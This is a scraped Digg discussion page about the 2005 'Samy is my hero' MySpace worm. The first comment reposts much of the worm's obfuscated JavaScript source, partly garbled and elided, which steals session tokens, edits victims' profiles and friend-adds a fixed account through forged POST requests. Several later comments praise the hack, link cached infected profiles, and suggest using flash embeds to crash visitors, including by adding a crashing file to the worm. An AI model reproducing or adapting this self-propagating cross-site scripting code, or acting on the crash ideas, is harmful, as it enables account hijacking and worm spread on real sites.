What is Digg?Sponsored by Dragon Age: Origins
Join the Dragon Age: Origins development team on Facebook view!
facebook.com/DragonAgeOrigins - EA presents BioWare's new dark fantasy epic Dragon Age: Origins. '9/10' from Game Informer.
144 Comments
- vermin, on 10/12/2007, -0/+6-div id=mycode style="BACKGROUND: url('....document.all.mycode.expr)')"
expr="var B=String.fromCharCode(34);
var A=String.fromCharCode(39);
function getSource(){var C;
try{var D=document.body.createTextRange();
C=D.htmlText}catch(e){}if(C){return C}else{return ..'document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');
L=getFromURL(AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();
for(var O=0;O0){N+='&'}var Q=escape(AV[P]);
while(Q.indexOf('+')!=-1){Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}..'J.onr'+'eadystatechange=BI');
J.open(BJ,BH,true);
if(BJ=='POST'){J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
J.setRequestHeader('Content-Length',BK.length)}J.send(BK);
return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;
var S=BF.substring(R,R+1024);
return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;
if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';
var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);
var X=W.indexOf(T);
var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=getSource();
var AB=AA.indexOf('m'+'ycode');
var AC=AA.substring(AB,AB+4096);
var AD=AC.indexOf('D'+'IV');
var AE=AC.substring(0,AD);
var AF;
if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');
AE=AE.replace('exp'+'r)','exp'+'r)'+A);
AF=' but most of all, samy is my hero. '}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;
AG=findIn(AU,'P'+'rofileHeroes','');
AG=AG.substring(61,AG.length);
if(AG.indexOf('samy')==-1){if(AF){AG+=AF;
var AR=getFromURL(AU,'Mytoken');
var AS=new Array();
AS['interestLabel']='heroes';
AS['submit']='Preview';
AS['interest']=AG;
J=getXMLObj();
httpSend('/index.cfm?fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}function postHero(){if(J.readyState!=4){return}var AU=J.responseText;
var AR=getFromURL(AU,'Mytoken');
var AS=new Array();
AS['interestLabel']='heroes';
AS['submit']='Submit';
AS['interest']=AG;
AS['hash']=getHiddenParameter(AU,'hash');
httpSend('/index.cfm?fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var AN=getClientFID();
var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}function processxForm(){if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');
var AR=getFromURL(AU,'Mytoken');
var AS=new Array();
AS['hashcode']=AQ;
AS['friendID']='11851658';
AS['submit']='Add to Friends';
httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return false}..'xmlhttp2.onr'+'eadystatechange=BI');
xmlhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}"-
-/div- - notdang, on 10/12/2007, -0/+5it seems that all infected users used IE, "Samy, the Hero" used document.all in his script :)
- inactive, on 10/12/2007, -0/+5Skeptical at first but this is very real. Do a google search for "samy is my hero" and click a Google CACHED view. This has the offending source code in it still.. very interesting stuff..
Google search: http://www.google.com/search?q=%22samy+is+my+hero%22&hl=en&lr=&filter=0
Infected Example: http://72.14.203.104/search?q=cache:uAk_EUTi-JIJ:profile.myspace.com/index.cfm%3Ffuseaction%3Duser.viewProfile%26friendID%3D11502422%26Mytoken%3D20050725224411+%22samy+is+my+hero%22&hl=en - EnzanBlues, on 10/12/2007, -0/+2Nice. This is the kind of stuff that should always be on digg. Not lame crap like there has been more of recently.
- vermin, on 10/12/2007, -0/+2Actually come to think of it, this is a big danger with sites that rely heavily on AJAX and allow arbitrary code. The power of server scripting in the hands of the client.
- lego1231, on 10/12/2007, -1/+3Myspace is nice to get back in touch with people from school that you otherwise wouldnt get in touch with
- chuckmo, on 10/12/2007, -0/+2I did something similair on thefacebook.com, an dit landed me in Newsweek
http://chuckmo.beupout.com/blog/2005/06/i-shall-call-him-thefacebot-thefacebook-quest-origins-part-1/ - Killerah, on 10/12/2007, -0/+2Samy is awesome! We should send him money! And by "we" I mean everybody else.
- weareglass, on 10/12/2007, -0/+2What do you myspace naysayers use besides myspace, or is it nothing at all? Personally I use Myspace to promote a monthly dance night I throw, and if it weren't there I'm sure a lot less people would come. Not to mention band pages being a genius move, with bigger and bigger bands using Myspace to promote their new albums (i.e. Gang of Four)
- cessax, on 10/12/2007, -0/+1lol this is great, although he didn't get me! haha the write up of the story is hilarious...my favorite part:
"I'm now more afraid and decide I am never doing anything even near illegal ever again. To get my mind off of everything, I begin downloading a copy of the latest Nip/Tuck episode." haha - p3ngu1n, on 10/12/2007, -0/+1http://chrisnowak.org/myspace_hack.txt
- ciphex, on 10/12/2007, -0/+1"Not online myspace dollars, but actual cash that can buy strippers. With all that money, Tom from myspace could basically do 2 chicks at once, 580 times."
hehehe.
As for the "hack"... cool. some spyware company is gonna pay this guy.
MySpace should thank him for pointing out a vulnerability, not sue him... we'll see. - vincenzothavise, on 10/12/2007, -0/+1Michael Bolton - "You know if this myspace website doesn't start giving me some friends, i could write a program that could make everyone my friend....everyone...big time."
- bvaughn, on 10/12/2007, -0/+1http://search.msn.com/results.aspx?q=site%3Amyspace.com+%22samy+is+my+hero%22&FORM=MSNH&srch_type=0
MSN Shows alot more people. - sirmalloc, on 10/12/2007, -0/+1technically this wasn't ajax as some others have said. it uses the same objects (XMLHttpRequest/MSXML2.XMLHTTP) as ajax code to make the requests, but there is no xml involved in the responses. this is simply doing a form post to myspace.
still pretty cool though. - inactive, on 10/12/2007, -1/+2Did some more research, this is the account it was adding
http://profile.myspace.com/index.cfm?fuseaction=user.viewProfile&friendID=11851658 - inactive, on 10/12/2007, -1/+2Looks like MySpace has "cleaned up" the problem, so be sure to check out the cached pages.
- Caboose101, on 10/12/2007, -0/+1Where exactly did he put the code ?
- vermin, on 10/12/2007, -0/+1Sorry about that, digg filters out html elements in the comments.
- ppss, on 10/12/2007, -0/+1this has been done before, when myspace allowed java script, By T0ast the cow, he got a nice letter from the owners
- spartan777, on 10/12/2007, -0/+1"Well, the most popular profiles on myspace pretty much consist of people with the IQ and English delivery skills of Kanye West."
too true. - agster11, on 10/12/2007, -0/+1haha thats awesome, if you guys want to have similar fun, myspace comments allow you to embed flash files. You can do quite a bit with flash files xD. I had it open google 50,000 times, successfully crashing anyone who visited the profile.
- xaph, on 10/12/2007, -0/+1This was awesome and hilarious. Tongue-in-cheek, and total geek humor.
Samy, you're my hero. - hypnotiq, on 10/12/2007, -0/+1"Myspace is nice to get back in touch with people from school that you otherwise wouldnt get in touch with"
Then why you bothering to get in touch? Who really cares about these people!
This is gonna make diggnation :) Can't wait to hear - blythe, on 10/12/2007, -0/+1after lurking around digg for a couple months, i registered JUST so i could digg this story. samy not only are you my hero, you're also my soulmate that i've been looking for!...okay, well maybe not...but he's still my hero!!
- weareglass, on 10/12/2007, -0/+1That's BS, Myspace is just as much about tech as IM services. It's about people using the internet as a tool to communicate. It allows user added content, it allows you to connect with other users. Aren't those some of the keystones of Web 2.0?
- chaoticjelly, on 10/12/2007, -0/+1Haha, this story made my day! Not only what he did, but his great comedic storytelling....
- jjafuller, on 10/12/2007, -0/+1I whipped up this t-shirt for myself. But, I made it public if anyone else wants one:
http://www.zazzle.com/products/product/product.asp?general%5Fcategory%5Fid=103001500200055451&caching=on&product%5Fid=235675854368861575&index=1 - subvertman, on 10/12/2007, -0/+1i want to see this geek's face. anyone?
- mindsinker, on 10/12/2007, -0/+15 out of 5
Hot Carls - msodrew, on 10/12/2007, -0/+1lol i wonder if that code still works.
- Dirtydog, on 10/12/2007, -0/+0That is awesome! Kudos Samy! your my hero! :-p
- Fixedamage, on 10/12/2007, -0/+0Awesome!
- imtigger2, on 10/12/2007, -0/+0I can't wait for the "Samy is my Hero" T-shirts !!
I'll wear it when my "all your base are belong to us!" shirt gets too many holes in it. - Tonyisbad, on 10/12/2007, -0/+0***** great "To get my mind off of everything, I begin downloading a copy of the latest Nip/Tuck episode." why didn't i think of this ***** before, never even crossed my mind. I give him props, even though FX is FOX, its their cable channel version of themselves.
- h4lofourt33n, on 10/12/2007, -0/+0Good story, funny how he thinks he's going to get accosted by FOX or Myspace Tom. Gooooooooood stuff.
- Tonyisbad, on 10/12/2007, -0/+0***** great "To get my mind off of everything, I begin downloading a copy of the latest Nip/Tuck episode." why didn't i think of this ***** before, never even crossed my mind. I give him props
- ridebmx, on 10/12/2007, -0/+0if (this gets promoted to be featured on the podcast)
kevin + alex are going to laugh their @@@ off, and spill beer all over their computers - XorSystem, on 10/12/2007, -0/+0I loved it!!!! Great stuff... I hate the myspace community so much, ***** bunch of emo kids and sluts.... well.. I don't hate the sluts...
- Taromsn, on 10/12/2007, -1/+1Wait, add the flash file to the self propogating MySpace code and you can effectively crash anyone who looks at a profile! Just use anonymizers to sign up for the account.
- kd5ftn, on 10/12/2007, -0/+0T-shirt Here: http://www.cafepress.com/blogoscoped.17990006
- kug001, on 10/12/2007, -0/+0Utterly awesome. Samy is my hero.
- Anth, on 10/12/2007, -0/+0Thats hilarious.
I want to go hack myspace now. POST requests are easy using XMLHTTPRequest. - tbrowne76, on 10/12/2007, -0/+0I think Alex and Kevin only use MySpace as a way to promote the show?? Who knows? I mean, I seriously doubt either of them would consistantly participate on such a site.
- aeoo, on 10/12/2007, -0/+0Great hack! Congrats, and this one is real, I swear, there is no javascript that's making me type this now: Samy, you ARE my hero! :) I especially loved the write up. I think the write up of what happened is where half the fun is.
- koheed, on 10/12/2007, -0/+0That was a funny read. I'll drink to that guy not getting harassed by FOX or MySpace. It didn't seem like he set out to do any harm.
- supremechees, on 10/12/2007, -0/+0wtf is is myspace account. it never says. also gay
-
Show 51 - 100 of 149 discussions
Browsing Digg on your phone just got easier with our enhancements to the 
© Digg Inc. 2009
— Content created and posted by Digg users is